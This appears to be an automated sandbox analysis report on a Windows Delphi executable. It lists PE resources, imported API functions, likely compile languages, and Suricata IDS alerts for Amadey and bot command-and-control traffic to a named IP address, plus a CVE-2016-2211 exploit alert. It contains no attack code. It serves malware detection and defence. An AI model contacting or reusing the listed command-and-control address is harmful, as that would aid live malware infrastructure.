RT_BITMAP	0x7ca094	0xb0	Device independent bitmap graphic, 9 x 9 x 4, image size 72	English	United States	0.42613636363636365
RT_BITMAP	0x7ca144	0xa28	Device independent bitmap graphic, 96 x 16 x 8, image size 1536			0.24884615384615386
RT_BITMAP	0x7cab6c	0xe0	Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors	English	United States	0.38392857142857145
RT_BITMAP	0x7cac4c	0xc0	Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors	English	United States	0.4947916666666667
RT_BITMAP	0x7cad0c	0x528	Device independent bitmap graphic, 16 x 16 x 8, image size 256	Chinese	China	0.4
RT_BITMAP	0x7cb234	0x828	Device independent bitmap graphic, 32 x 32 x 8, image size 1024	Chinese	China	0.3160919540229885
RT_BITMAP	0x7cba5c	0x528	Device independent bitmap graphic, 16 x 16 x 8, image size 256	Chinese	China	0.4106060606060606
RT_BITMAP	0x7cbf84	0xc0	Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors	English	United States	0.484375
RT_BITMAP	0x7cc044	0x78	Device independent bitmap graphic, 4 x 4 x 4, image size 16	English	United States	0.5083333333333333
RT_BITMAP	0x7cc0bc	0x88	Device independent bitmap graphic, 3 x 8 x 4, image size 32	English	United States	0.4485294117647059
RT_BITMAP	0x7cc144	0x88	Device independent bitmap graphic, 3 x 8 x 4, image size 32	English	United States	0.4485294117647059
RT_BITMAP	0x7cc1cc	0xe0	Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors	English	United States	0.42410714285714285
RT_BITMAP	0x7cc2ac	0xc0	Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors	English	United States	0.5104166666666666
RT_BITMAP	0x7cc36c	0xe0	Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors	English	United States	0.5
RT_BITMAP	0x7cc44c	0xc0	Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors	English	United States	0.4895833333333333
RT_BITMAP	0x7cc50c	0xe8	Device independent bitmap graphic, 16 x 16 x 4, image size 128	English	United States	0.31896551724137934
RT_BITMAP	0x7cc5f4	0xe8	Device independent bitmap graphic, 16 x 16 x 4, image size 128	English	United States	0.3275862068965517
RT_BITMAP	0x7cc6dc	0x98	Device independent bitmap graphic, 9 x 6 x 4, image size 48, 16 important colors	English	United States	0.5197368421052632
RT_BITMAP	0x7cc774	0x98	Device independent bitmap graphic, 9 x 6 x 4, image size 48, 16 important colors	English	United States	0.506578947368421
RT_BITMAP	0x7cc80c	0x4b8	Device independent bitmap graphic, 12 x 12 x 8, image size 144			0.44039735099337746
RT_BITMAP	0x7cccc4	0x4b8	Device independent bitmap graphic, 12 x 12 x 8, image size 144			0.429635761589404
RT_BITMAP	0x7cd17c	0x668	Device independent bitmap graphic, 24 x 24 x 8, image size 576	English	United States	0.3725609756097561
RT_BITMAP	0x7cd7e4	0xe0	Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors	English	United States	0.3794642857142857
RT_BITMAP	0x7cd8c4	0x74	Device independent bitmap graphic, 8 x 3 x 4, image size 12	English	United States	0.5172413793103449
RT_BITMAP	0x7cd938	0x78	Device independent bitmap graphic, 4 x 4 x 4, image size 16	English	United States	0.475
RT_BITMAP	0x7cd9b0	0x74	Device independent bitmap graphic, 8 x 3 x 4, image size 12	English	United States	0.5172413793103449
RT_BITMAP	0x7cda24	0xce8	Device independent bitmap graphic, 400 x 16 x 4, image size 3200			0.1089588377723971
RT_BITMAP	0x7ce70c	0xce8	Device independent bitmap graphic, 400 x 16 x 4, image size 3200			0.10714285714285714
RT_BITMAP	0x7cf3f4	0xce8	Device independent bitmap graphic, 400 x 16 x 4, image size 3200			0.0950363196125908
RT_BITMAP	0x7d00dc	0x268	Device independent bitmap graphic, 32 x 32 x 4, image size 512			0.21266233766233766
RT_BITMAP	0x7d0344	0x268	Device independent bitmap graphic, 32 x 32 x 4, image size 512			0.17207792207792208
RT_BITMAP	0x7d05ac	0x268	Device independent bitmap graphic, 32 x 32 x 4, image size 512			0.1672077922077922
RT_BITMAP	0x7d0814	0xce8	Device independent bitmap graphic, 400 x 16 x 4, image size 3200			0.11955205811138014
RT_BITMAP	0x7d14fc	0xce8	Device independent bitmap graphic, 400 x 16 x 4, image size 3200			0.11561743341404358
RT_BITMAP	0x7d21e4	0xd28	Device independent bitmap graphic, 144 x 16 x 8, image size 2304			0.23634204275534443
RT_BITMAP	0x7d2f0c	0x4b2a	Device independent bitmap graphic, 400 x 16 x 24, image size 0, resolution 2834 x 2834 px/m			0.2749194470429269
RT_BITMAP	0x7d7a38	0x126	Device independent bitmap graphic, 9 x 9 x 24, image size 0, resolution 2834 x 2834 px/m			0.5850340136054422
RT_BITMAP	0x7d7b60	0x126	Device independent bitmap graphic, 9 x 9 x 24, image size 0, resolution 2834 x 2834 px/m			0.5918367346938775
RT_ICON	0x7d7c88	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	Chinese	China	0.4527027027027027
RT_ICON	0x7d7db0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2835 x 2835 px/m	English	United States	0.6214539007092199
RT_ICON	0x7d8218	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2835 x 2835 px/m	English	United States	0.37406191369606
RT_ICON	0x7d92c0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2835 x 2835 px/m	English	United States	0.28226141078838174
RT_ICON	0x7db868	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 2835 x 2835 px/m	English	United States	0.23358526216343883
RT_ICON	0x7dfa90	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 2835 x 2835 px/m	English	United States	0.1762244173666154
RT_ICON	0x7f02b8	0x9cca	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	1.0004235387911704
RT_STRING	0x7f9f84	0x15c	data			0.47988505747126436
RT_STRING	0x7fa0e0	0x570	data			0.3742816091954023
RT_STRING	0x7fa650	0x428	data			0.3167293233082707
RT_STRING	0x7faa78	0x290	data			0.4146341463414634
RT_STRING	0x7fad08	0x2b8	data			0.4209770114942529
RT_STRING	0x7fafc0	0x33c	data			0.32971014492753625
RT_STRING	0x7fb2fc	0x61c	data			0.3804347826086957
RT_STRING	0x7fb918	0x828	data			0.35009578544061304
RT_STRING	0x7fc140	0xb28	data			0.24299719887955182
RT_STRING	0x7fcc68	0x3bc	data			0.38493723849372385
RT_STRING	0x7fd024	0x248	data			0.3527397260273973
RT_STRING	0x7fd26c	0x120	data			0.5486111111111112
RT_STRING	0x7fd38c	0x134	data			0.5292207792207793
RT_STRING	0x7fd4c0	0xe4	data			0.631578947368421
RT_STRING	0x7fd5a4	0x5cc	data			0.3450134770889488
RT_STRING	0x7fdb70	0x460	data			0.42410714285714285
RT_STRING	0x7fdfd0	0x370	data			0.35568181818181815
RT_STRING	0x7fe340	0x2fc	data			0.4175392670157068
RT_STRING	0x7fe63c	0x2d4	data			0.35773480662983426
RT_STRING	0x7fe910	0x474	data			0.3140350877192982
RT_STRING	0x7fed84	0x314	data			0.35913705583756345
RT_STRING	0x7ff098	0x3a4	data			0.388412017167382
RT_STRING	0x7ff43c	0x610	data			0.30605670103092786
RT_STRING	0x7ffa4c	0x37c	data			0.4192825112107623
RT_STRING	0x7ffdc8	0x5cc	data			0.29582210242587603
RT_STRING	0x800394	0x850	data			0.12828947368421054
RT_STRING	0x800be4	0x944	data			0.12310286677908938
RT_STRING	0x801528	0x734	data			0.1643167028199566
RT_STRING	0x801c5c	0x848	data			0.13962264150943396
RT_STRING	0x8024a4	0xa58	data			0.12009063444108761
RT_STRING	0x802efc	0x7f4	data			0.1556974459724951
RT_STRING	0x8036f0	0x774	data			0.24109014675052412
RT_STRING	0x803e64	0x2a4	data			0.44822485207100593
RT_STRING	0x804108	0x12c	data			0.5433333333333333
RT_STRING	0x804234	0x230	data			0.5089285714285714
RT_STRING	0x804464	0x46c	data			0.3666077738515901
RT_STRING	0x8048d0	0x144	data			0.4783950617283951
RT_STRING	0x804a14	0x148	data			0.4298780487804878
RT_STRING	0x804b5c	0x1d4	data			0.3782051282051282
RT_STRING	0x804d30	0x194	data			0.42574257425742573
RT_STRING	0x804ec4	0x158	data			0.44476744186046513
RT_STRING	0x80501c	0x3e0	data			0.3588709677419355
RT_STRING	0x8053fc	0x448	data			0.36313868613138683
RT_STRING	0x805844	0x444	data			0.35622710622710624
RT_STRING	0x805c88	0x374	data			0.36425339366515835
RT_STRING	0x805ffc	0x3ac	AmigaOS bitmap font "a", fc_YSize 25344, 17152 elements, 2nd "n", 3rd "n"			0.42021276595744683
RT_STRING	0x8063a8	0x2ac	data			0.47514619883040937
RT_STRING	0x806654	0xbc	data			0.675531914893617
RT_STRING	0x806710	0xfc	data			0.6507936507936508
RT_STRING	0x80680c	0x254	data			0.49161073825503354
RT_STRING	0x806a60	0x388	data			0.3805309734513274
RT_STRING	0x806de8	0x3f0	data			0.39285714285714285
RT_STRING	0x8071d8	0x47c	data			0.3858885017421603
RT_STRING	0x807654	0x398	data			0.3576086956521739
RT_STRING	0x8079ec	0x3b0	data			0.3813559322033898
RT_STRING	0x807d9c	0x468	data			0.35726950354609927
RT_STRING	0x808204	0x494	data			0.3532423208191126
RT_STRING	0x808698	0x394	data			0.3569868995633188
RT_STRING	0x808a2c	0x3ec	data			0.38147410358565736
RT_STRING	0x808e18	0x268	data			0.40584415584415584
RT_STRING	0x809080	0xb8	data			0.6467391304347826
RT_STRING	0x809138	0x9c	data			0.6410256410256411
RT_STRING	0x8091d4	0x350	data			0.42806603773584906
RT_STRING	0x809524	0x474	data			0.29385964912280704
RT_STRING	0x809998	0x36c	data			0.4018264840182648
RT_STRING	0x809d04	0x2c4	data			0.4392655367231638
RT_RCDATA	0x809fc8	0x10	data			1.5
RT_RCDATA	0x809fd8	0x1580	data			0.540515988372093
RT_RCDATA	0x80b558	0x2	data	English	United States	5.0
RT_RCDATA	0x80b55c	0xdb85	Delphi compiled form 'Tcmdform'			0.9258145452604232
RT_RCDATA	0x8190e4	0xac53	Delphi compiled form 'Tcomprform'			0.31544826022894706
RT_RCDATA	0x823d38	0x30bb	Delphi compiled form 'TContForm'			0.5986372745490982
RT_RCDATA	0x826df4	0x1ea	Delphi compiled form 'TDropDownForm'			0.6979591836734694
RT_RCDATA	0x826fe0	0x50f6	Delphi compiled form 'TEncForm'			0.8032905529286886
RT_RCDATA	0x82c0d8	0xae9	Delphi compiled form 'TFormColumnSettings'			0.4446831364124597
RT_RCDATA	0x82cbc4	0xde1	Delphi compiled form 'TFrame1'			0.41373487193920633
RT_RCDATA	0x82d9a8	0x142e	Delphi compiled form 'TMess'			0.9479287650019357
RT_RCDATA	0x82edd8	0x2eab	Delphi compiled form 'TQForm'			0.34728383694651377
RT_RCDATA	0x831c84	0x45e2	Delphi compiled form 'TUpxForm'			0.243599776411403
RT_RCDATA	0x836268	0x2a7	Delphi compiled form 'Tzgf'			0.6318114874815906
RT_GROUP_CURSOR	0x836510	0x14	Lotus unknown worksheet or configuration, revision 0x1			1.25
RT_GROUP_CURSOR	0x836524	0x14	Lotus unknown worksheet or configuration, revision 0x1			1.25
RT_GROUP_CURSOR	0x836538	0x14	Lotus unknown worksheet or configuration, revision 0x1			1.3
RT_GROUP_CURSOR	0x83654c	0x14	Lotus unknown worksheet or configuration, revision 0x1			1.3
RT_GROUP_CURSOR	0x836560	0x14	Lotus unknown worksheet or configuration, revision 0x1			1.3
RT_GROUP_CURSOR	0x836574	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x836588	0x14	data			1.4
RT_GROUP_CURSOR	0x83659c	0x14	data			1.4
RT_GROUP_CURSOR	0x8365b0	0x14	data			1.4
RT_GROUP_CURSOR	0x8365c4	0x14	data			1.4
RT_GROUP_CURSOR	0x8365d8	0x14	data			1.4
RT_GROUP_CURSOR	0x8365ec	0x14	data			1.4
RT_GROUP_CURSOR	0x836600	0x14	data			1.4
RT_GROUP_CURSOR	0x836614	0x14	data			1.4
RT_GROUP_CURSOR	0x836628	0x14	data			1.4
RT_GROUP_CURSOR	0x83663c	0x14	data			1.4
RT_GROUP_CURSOR	0x836650	0x14	data			1.4
RT_GROUP_CURSOR	0x836664	0x14	data			1.4
RT_GROUP_CURSOR	0x836678	0x14	Lotus unknown worksheet or configuration, revision 0x1			1.25
RT_GROUP_CURSOR	0x83668c	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x8366a0	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.25
RT_GROUP_CURSOR	0x8366b4	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x8366c8	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x8366dc	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x8366f0	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x836704	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_ICON	0x836718	0x5a	data	English	United States	0.7777777777777778
RT_VERSION	0x836774	0x2e8	data	English	United States	0.4650537634408602
RT_MANIFEST	0x836a5c	0x2ca	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5028011204481793

Imports

DLL	Import
oleaut32.dll	SysFreeString, SysReAllocStringLen, SysAllocStringLen
advapi32.dll	RegQueryValueExW, RegOpenKeyExW, RegCloseKey
user32.dll	MessageBoxA, CharNextW, LoadStringW
kernel32.dll	Sleep, VirtualFree, VirtualAlloc, lstrlenW, lstrcpynW, VirtualQuery, QueryPerformanceCounter, GetTickCount, GetSystemInfo, GetVersion, CompareStringW, IsDBCSLeadByteEx, IsValidLocale, GetSystemDefaultUILanguage, GetUserDefaultUILanguage, GetLocaleInfoW, WideCharToMultiByte, MultiByteToWideChar, GetConsoleOutputCP, GetConsoleCP, GetACP, LoadLibraryExW, GetStartupInfoW, GetProcAddress, GetModuleHandleW, GetModuleFileNameW, GetCommandLineW, FreeLibrary, GetLastError, UnhandledExceptionFilter, RtlUnwind, RaiseException, ExitProcess, ExitThread, SwitchToThread, GetCurrentThreadId, CreateThread, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, FindFirstFileW, FindClose, SetCurrentDirectoryW, GetCurrentDirectoryW, RemoveDirectoryW, CreateDirectoryW, WriteFile, SetFilePointer, SetEndOfFile, ReadFile, GetFileType, GetFileSize, CreateFileW, GetStdHandle, CloseHandle
kernel32.dll	GetProcAddress, RaiseException, LoadLibraryA, GetLastError, TlsSetValue, TlsGetValue, LocalFree, LocalAlloc, GetModuleHandleW, FreeLibrary
user32.dll	SetClassLongW, GetClassLongW, SetWindowLongW, GetWindowLongW, CreateWindowExA, CreateWindowExW, WindowFromPoint, WaitMessage, WaitForInputIdle, ValidateRect, UpdateWindow, UnregisterClassA, UnregisterClassW, UnionRect, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenuEx, TrackPopupMenu, ToAscii, SystemParametersInfoW, SubtractRect, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCaret, SetWindowRgn, SetWindowsHookExW, SetWindowTextW, SetWindowPos, SetWindowPlacement, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRectEmpty, SetRect, SetPropW, SetParent, SetMenuItemInfoW, SetMenu, SetForegroundWindow, SetFocus, SetCursorPos, SetCursor, SetClipboardData, SetCapture, SetActiveWindow, SendNotifyMessageW, SendMessageA, SendMessageW, ScrollWindow, ScrollDC, ScreenToClient, RemovePropW, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageW, RegisterClipboardFormatW, RegisterClassA, RegisterClassW, RedrawWindow, PtInRect, PostThreadMessageW, PostQuitMessage, PostMessageW, PeekMessageA, PeekMessageW, OpenClipboard, OffsetRect, OemToCharBuffW, OemToCharBuffA, OemToCharA, NotifyWinEvent, MsgWaitForMultipleObjectsEx, MsgWaitForMultipleObjects, MoveWindow, MessageBoxA, MessageBoxW, MessageBeep, MapWindowPoints, MapVirtualKeyW, LockWindowUpdate, LoadStringW, LoadKeyboardLayoutW, LoadIconW, LoadCursorW, LoadBitmapW, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsDialogMessageW, IsClipboardFormatAvailable, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuItemW, InsertMenuW, InflateRect, HideCaret, GetWindowThreadProcessId, GetWindowTextW, GetWindowRect, GetWindowPlacement, GetWindowDC, GetUpdateRect, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetScrollBarInfo, GetPropW, GetParent, GetWindow, GetMessagePos, GetMessageExtraInfo, GetMessageW, GetMenuStringW, GetMenuState, GetMenuItemInfoA, GetMenuItemInfoW, GetMenuItemID, GetMenuItemCount, GetMenuDefaultItem, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameW, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextW, GetIconInfo, GetForegroundWindow, GetFocus, GetDoubleClickTime, GetDlgItem, GetDlgCtrlID, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardFormatNameW, GetClipboardData, GetClientRect, GetClassNameW, GetClassInfoExW, GetClassInfoA, GetClassInfoW, GetCapture, GetAsyncKeyState, GetActiveWindow, FrameRect, FindWindowExW, FindWindowW, FillRect, ExitWindowsEx, EqualRect, EnumWindows, EnumThreadWindows, EnumClipboardFormats, EnumChildWindows, EndPaint, EndMenu, EndDeferWindowPos, EnableWindow, EnableScrollBar, EnableMenuItem, EmptyClipboard, DrawTextExW, DrawTextW, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DrawCaption, DispatchMessageA, DispatchMessageW, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DeferWindowPos, DefWindowProcW, DefMDIChildProcW, DefFrameProcW, CreatePopupMenu, CreateMenu, CreateIconIndirect, CreateIconFromResourceEx, CreateIcon, CreateAcceleratorTableW, CountClipboardFormats, CopyImage, CopyIcon, CloseClipboard, ClipCursor, ClientToScreen, ChildWindowFromPointEx, ChildWindowFromPoint, CheckMenuItem, CharUpperBuffW, CharUpperW, CharToOemBuffW, CharNextW, CharLowerBuffW, CharLowerW, CallWindowProcW, CallNextHookEx, BringWindowToTop, BeginPaint, BeginDeferWindowPos, CharLowerBuffA, CharUpperBuffA, CharToOemBuffA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
msimg32.dll	GradientFill, AlphaBlend
gdi32.dll	UnrealizeObject, TextOutW, StretchDIBits, StretchBlt, StartPage, StartDocW, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetTextAlign, SetStretchBltMode, SetROP2, SetPixelV, SetPixel, SetPaletteEntries, SetMapMode, SetEnhMetaFileBits, SetDIBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SetAbortProc, SelectPalette, SelectObject, SelectClipRgn, SelectClipPath, SaveDC, RoundRect, RestoreDC, ResizePalette, Rectangle, RectVisible, RealizePalette, Polyline, Polygon, PolyBezierTo, PolyBezier, PlayEnhMetaFile, Pie, PatBlt, OffsetRgn, OffsetClipRgn, MoveToEx, MaskBlt, LineTo, LPtoDP, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsW, GetTextExtentPointW, GetTextExtentPoint32A, GetTextExtentPoint32W, GetTextColor, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectW, GetNearestPaletteIndex, GetMapMode, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileDescriptionW, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetCurrentPositionEx, GetCurrentObject, GetClipRgn, GetClipBox, GetBrushOrgEx, GetBkColor, GetBitmapBits, GdiFlush, FrameRgn, ExtTextOutW, ExtFloodFill, ExcludeClipRect, EnumFontsW, EnumFontFamiliesExW, EndPath, EndPage, EndDoc, Ellipse, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreateRoundRectRgn, CreateRectRgnIndirect, CreateRectRgn, CreatePolygonRgn, CreatePenIndirect, CreatePen, CreatePatternBrush, CreatePalette, CreateICW, CreateHalftonePalette, CreateFontIndirectW, CreateDIBitmap, CreateDIBSection, CreateDCW, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileW, CombineRgn, Chord, BitBlt, BeginPath, ArcTo, Arc, AngleArc, AbortDoc
version.dll	VerQueryValueW, GetFileVersionInfoSizeW, GetFileVersionInfoW
mpr.dll	WNetGetUniversalNameW, WNetCancelConnection2W, WNetAddConnectionW
kernel32.dll	lstrlenA, lstrlenW, lstrcpyA, lstrcmpiA, lstrcmpiW, lstrcmpA, lstrcmpW, WritePrivateProfileStringW, WriteFile, WideCharToMultiByte, WaitForSingleObjectEx, WaitForSingleObject, WaitForMultipleObjectsEx, WaitForMultipleObjects, VirtualQueryEx, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, VerLanguageNameW, UnmapViewOfFile, TryEnterCriticalSection, TerminateThread, SwitchToThread, SuspendThread, Sleep, SizeofResource, SignalObjectAndWait, SetVolumeLabelW, SetThreadPriority, SetThreadLocale, SetLastError, SetHandleInformation, SetFileTime, SetFilePointer, SetFileAttributesW, SetEvent, SetErrorMode, SetEndOfFile, SetCurrentDirectoryW, SearchPathA, SearchPathW, ResumeThread, ResetEvent, RemoveDirectoryW, ReleaseMutex, ReadFile, RaiseException, QueryPerformanceFrequency, QueryPerformanceCounter, QueryDosDeviceW, IsDebuggerPresent, OutputDebugStringW, OpenProcess, OpenMutexW, OpenFileMappingW, OpenFile, MultiByteToWideChar, MulDiv, MoveFileExW, MoveFileA, MoveFileW, MapViewOfFile, LockResource, LocalFree, LocalFileTimeToFileTime, LoadResource, LoadLibraryExW, LoadLibraryA, LoadLibraryW, LeaveCriticalSection, IsValidLocale, InitializeCriticalSection, GlobalUnlock, GlobalSize, GlobalMemoryStatus, GlobalLock, GlobalFree, GlobalFindAtomW, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomW, GetWindowsDirectoryW, GetVolumeInformationW, GetVersionExW, GetVersion, GetUserDefaultLCID, GetTimeZoneInformation, GetTickCount, GetThreadPriority, GetThreadLocale, GetTempPathA, GetTempPathW, GetTempFileNameW, GetSystemTime, GetSystemInfo, GetSystemDirectoryA, GetSystemDirectoryW, GetStringTypeExA, GetStringTypeExW, GetStdHandle, GetShortPathNameW, GetProcAddress, GetPrivateProfileStringW, GetOEMCP, GetModuleHandleA, GetModuleHandleW, GetModuleFileNameW, GetLogicalDrives, GetLogicalDriveStringsW, GetLocaleInfoW, GetLocalTime, GetLastError, GetFullPathNameW, GetFileTime, GetFileSize, GetFileInformationByHandle, GetFileAttributesExW, GetFileAttributesW, GetExitCodeThread, GetExitCodeProcess, GetDriveTypeA, GetDriveTypeW, GetDiskFreeSpaceA, GetDiskFreeSpaceW, GetDateFormatW, GetCurrentThreadId, GetCurrentThread, GetCurrentProcessId, GetCurrentProcess, GetCurrentDirectoryW, GetComputerNameW, GetCPInfoExW, GetCPInfo, GetBinaryTypeA, GetACP, FreeResource, InterlockedIncrement, InterlockedExchangeAdd, InterlockedExchange, InterlockedDecrement, InterlockedCompareExchange, FreeLibrary, FormatMessageW, FlushFileBuffers, FindResourceW, FindNextFileA, FindNextFileW, FindNextChangeNotification, FindFirstFileA, FindFirstFileW, FindFirstChangeNotificationA, FindCloseChangeNotification, FindClose, FileTimeToSystemTime, FileTimeToLocalFileTime, FileTimeToDosDateTime, ExpandEnvironmentStringsA, ExpandEnvironmentStringsW, ExitThread, EnumSystemLocalesW, EnumResourceNamesW, EnumCalendarInfoW, EnterCriticalSection, DuplicateHandle, DosDateTimeToFileTime, DeviceIoControl, DeleteFileW, DeleteCriticalSection, DefineDosDeviceW, CreateThread, CreateProcessW, CreatePipe, CreateFileMappingW, CreateFileA, CreateFileW, CreateEventW, CreateDirectoryW, CopyFileW, CompareStringA, CompareStringW, CompareFileTime, CloseHandle
advapi32.dll	RegUnLoadKeyW, RegSetValueExA, RegSetValueExW, RegSaveKeyW, RegRestoreKeyW, RegReplaceKeyW, RegQueryValueExA, RegQueryValueExW, RegQueryInfoKeyW, RegOpenKeyExA, RegOpenKeyExW, RegOpenKeyW, RegLoadKeyW, RegFlushKey, RegEnumValueW, RegEnumKeyW, RegEnumKeyExW, RegDeleteValueW, RegDeleteKeyW, RegCreateKeyExW, RegCreateKeyW, RegConnectRegistryW, RegCloseKey, OpenProcessToken, LookupPrivilegeValueW, GetUserNameW, AdjustTokenPrivileges
oleaut32.dll	GetErrorInfo, VariantInit, SysStringByteLen, SysFreeString, SysAllocString
ole32.dll	CreateStreamOnHGlobal, CreateILockBytesOnHGlobal, ReleaseStgMedium, OleFlushClipboard, OleGetClipboard, OleSetClipboard, DoDragDrop, RevokeDragDrop, RegisterDragDrop, OleUninitialize, OleInitialize, StgCreateDocfileOnILockBytes, CreateDataAdviseHolder, CoTaskMemFree, CoTaskMemAlloc, StringFromCLSID, CoCreateInstance, CoGetInterfaceAndReleaseStream, CoMarshalInterThreadInterfaceInStream, CoDisconnectObject, CoUninitialize, CoInitialize, IsEqualGUID
IMAGEHLP.DLL	CheckSumMappedFile
kernel32.dll	Sleep
oleaut32.dll	SafeArrayPtrOfIndex, SafeArrayGetElement, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopyInd, VariantCopy, VariantClear, VariantInit
comctl32.dll	InitializeFlatSB, FlatSB_SetScrollProp, FlatSB_SetScrollPos, FlatSB_SetScrollInfo, FlatSB_GetScrollPos, FlatSB_GetScrollInfo, _TrackMouseEvent, ImageList_GetImageInfo, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_SetDragCursorImage, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Copy, ImageList_LoadImageW, ImageList_GetIcon, ImageList_Remove, ImageList_DrawIndirect, ImageList_DrawEx, ImageList_Replace, ImageList_Draw, ImageList_SetOverlayImage, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_SetImageCount, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create, InitCommonControls
shell32.dll	SHGetFileInfoA, SHGetFileInfoW, SHFileOperationA, SHFileOperationW, ShellExecuteExA, ShellExecuteExW, ShellExecuteA, ShellExecuteW, ShellAboutW, Shell_NotifyIconW, FindExecutableW, ExtractIconW, ExtractAssociatedIconW
shell32.dll	SHGetSpecialFolderPathW, SHGetSpecialFolderLocation, SHGetPathFromIDListW, SHGetMalloc, SHGetDesktopFolder, SHGetDataFromIDListA, SHGetDataFromIDListW, SHBrowseForFolderW
comdlg32.dll	GetSaveFileNameW, GetOpenFileNameW
winspool.drv	OpenPrinterW, EnumPrintersW, DocumentPropertiesW, ClosePrinter
user32.dll	EnumDisplayMonitors, GetMonitorInfoW, MonitorFromPoint, MonitorFromRect, MonitorFromWindow
msvcrt.dll	memset, memcpy
winspool.drv	GetDefaultPrinterW
kernel32.dll	GetVersionExW, CreateMutexW
msvcrt.dll	sprintf, _ftol
msvcrt.dll	strncmp, _stricmp
cabinet.dll	FCIDestroy, FCIFlushFolder, FCIFlushCabinet, FCIAddFile, FCICreate
cabinet.dll	FDIDestroy, FDICopy, FDIIsCabinet, FDICreate
shell32.dll	SHFormatDrive
winmm.dll	timeGetTime, PlaySoundW
comctl32.dll	InitCommonControls
oleacc.dll	AccessibleObjectFromWindow, LresultFromObject
GDI32.DLL	GetRandomRgn
shell32.dll

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States
Spanish	Argentina
German	Germany
Chinese	China

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-31T14:25:18.189895+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	20.12.23.50	443	192.168.2.9	49805	TCP
2024-10-31T14:25:35.128154+0100	2856097	ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2)	1	192.168.2.9	49903	172.67.213.173	80	TCP
2024-10-31T14:25:37.559393+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.9	49916	172.67.213.173	80	TCP
2024-10-31T14:25:40.089539+0100	2856097	ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2)	1	192.168.2.9	49930	172.67.213.173	80	TCP
2024-10-31T14:25:40.089539+0100	2856147	ETPRO MALWARE Amadey CnC Activity M3	1	192.168.2.9	49930	172.67.213.173	80	TCP
2024-10-31T14:25:42.511087+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.9	49946	172.67.213.173	80	TCP
2024-10-31T14:25:45.009461+0100	2856097	ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2)	1	192.168.2.9	49962	172.67.213.173	80	TCP
